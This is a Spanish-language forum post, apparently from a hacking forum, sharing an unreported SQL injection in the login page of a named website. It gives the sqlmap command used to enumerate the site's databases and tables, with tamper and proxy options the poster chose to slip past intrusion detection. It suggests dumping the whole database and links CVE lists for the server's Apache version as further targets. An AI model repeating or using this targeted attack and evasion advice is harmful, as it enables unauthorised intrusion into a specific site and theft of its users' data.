Hola a todos , nose si es mi primer post , espero que no, en caso de ser asi, me doy por presentado, y os traigo un regalito:
Web:
http://www.idocz.net/Login.php?id='

Utilice Sqlmap para explotar la vulnerabilidad, acontinuacion pongo los parametro usados para listar las bases de datos y las tablas
C:\sqlmap>sqlmap.py -u "
http://www.idocz.net/Login.php?id=" --dbs --dbms=MySQL --ignore-proxy --tamper "space2morehash" -D idocz_web --tables

utilice la opcion tamper y ignore-proxy porque en el lugar que lo estoy haciendo hay ids , ips y me bloqueba los ataques (No seria necesario), en caso de querer hacer un dumpeado , bastaria con la opcion --dump-all alfinal.
me interese un poco en la version de apache que tiene el servidor que es la Apache 2.2.14 y encontre muchos exploits, os expongo la url de uno de ellos que me parecio interesante , esto no lo he podido probar ya que no dispongo de linux en este momento.
http://www.cvedetails.com/cve/CVE-2013-2249/y la lista completa para esa version de apache 2.2.14 es:
http://www.cvedetails.com/vulnerability-list/vendor_id-45/product_id-66/version_id-87506/Apache-Http-Server-2.2.14.htmlnose si serva vulnerable a todos pero alguno seguro!!
He intentado ser todo lo explicito que he podido, nose si demasiado, o demasiado poco , en cualquier caso , que los moderadores me digan!
la vulnerabilidad no ha sido reportada.
Espero que os haya resultado interesantem o por lo menos tan interesante como ami hacerlo

, gracias a todos por este foro!